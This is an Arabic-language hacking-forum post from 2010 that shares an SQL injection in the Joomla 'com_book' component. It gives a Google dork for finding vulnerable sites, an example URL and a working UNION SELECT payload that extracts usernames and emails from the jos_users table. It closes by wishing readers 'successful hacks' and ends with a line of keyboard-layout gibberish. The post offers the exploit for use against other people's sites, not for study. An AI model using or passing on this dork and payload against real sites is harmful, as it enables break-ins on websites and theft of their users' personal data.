السلام عليكم يا عناكب
كيف الحال
إن شاء الله تمام
يوم 21-01-2010
جئت بثغرة في سكريبت جمولة المشهوووور بكثرة ثغرات السكيول فيه
اليوم الثغرة تقول لكم
دورك البحث عن مواقع المصابة
كود PHP:
Dork:[ inurl:"com_book" ]
مثااااااااااااااااااااااااااال
كود PHP:
http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=
تطبيق الثغرة
كود PHP:
index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users--
الثغرة من إكتشاف الأخ Evil-Cod3r
إن شاء الله
إختراقات موفقة
eyvm lk eyvhj s;vdfj [l,gm